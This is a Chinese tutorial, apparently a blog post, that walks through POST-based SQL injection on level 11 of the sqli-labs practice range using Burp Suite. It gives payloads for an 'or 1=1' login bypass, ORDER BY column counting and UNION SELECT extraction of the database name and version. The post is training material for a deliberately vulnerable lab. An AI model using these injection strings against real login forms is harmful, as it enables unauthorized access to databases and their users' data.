POST注入通过sqli-labs靶场less-11

在这里插入图片描述

POST注入原理

在这里插入图片描述

原理介绍

进入第十一关靶场,我们发现是一个登录窗口,随意提交数据,显示
在这里插入图片描述
在url地址进行get提交,发现一直是登录窗口,页面无其他变化,想到post提交注入。

通关原理

打开靶场源码文件。

在这里插入图片描述
查看提交方式。
在这里插入图片描述
我们可以添加语句来查看我们提交语句后后台查询的语句

echo $sql;

在这里插入图片描述

进行注入

可以使用hackbar插件进行post提交注入,也可以使用burp suite进行注入,本次使用burpsuite
随意提交参数
在这里插入图片描述
报错登陆失败,图片中黄色部分是因为前面添加的echo $sql;在实际的环境中,我们需要经验来猜测和尝试,加上是方便大家理解原理。
抓包发送到burpsuite。抓包数据
在这里插入图片描述
将其发送到Repeater模块。

判断闭合方式,列数,回显位置

因为我们查看过源码,知道闭合方式为单引号,在实际测试中可以尝试各种闭合方式。比如','),')),","),"))等。
post提交语句
.>uname=asf’ or 1=1 --+ &passwd=asdg&submit=Submit
在这里插入图片描述
可以看到 SELECT username, password FROM users WHERE username=‘asf’ or 1=1 --+’ and password=‘’ LIMIT 0,1为查询语句,这是web服务器接收到的,再进行数据库查询比对时,实际语句为

SELECT username, password FROM users WHERE username='asf’ or 1=1;

判断列数

uname=asf’ order by 4 --+ &passwd=asdg&submit=Submit

在这里插入图片描述
4的时候不对,当为2时,显示正确,列数为2.
回显位置:

uname=asf’ union select 1,2 --+ &passwd=asdg&submit=Submit

查询数据库

uname=asf ’ union select database(),version() --+ &passwd=asdg&submit=Submit

在这里插入图片描述
爆数据库
在这里插入图片描述
在这里插入图片描述

其他操作与union注入语句大差不差

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值